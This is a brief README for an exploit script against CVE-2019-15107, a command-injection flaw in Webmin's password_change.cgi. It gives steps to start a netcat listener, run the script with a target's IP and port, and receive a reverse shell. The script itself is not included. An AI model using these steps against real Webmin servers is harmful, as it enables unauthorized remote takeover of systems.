https://www.cvedetails.com/cve/CVE-2019-15107/
An issue was discovered in Webmin <=1.920. The parameters "old" and "expire" in password_change.cgi contain a command injection vulnerability.
- Start a listener on red box.
rlwrap -cAr nc -lvp 1919
- Run the exploit
./exploit.sh
- Arguments will be prompted:
- ip address of the target
- target port running webmin (usually 10000)
- local listener port
- local interface where the listener is running (eth0, tun0, etc)
Let the stuff run, a reverse shell is received on listener.
Feel free to use or modify whenever and wherever you like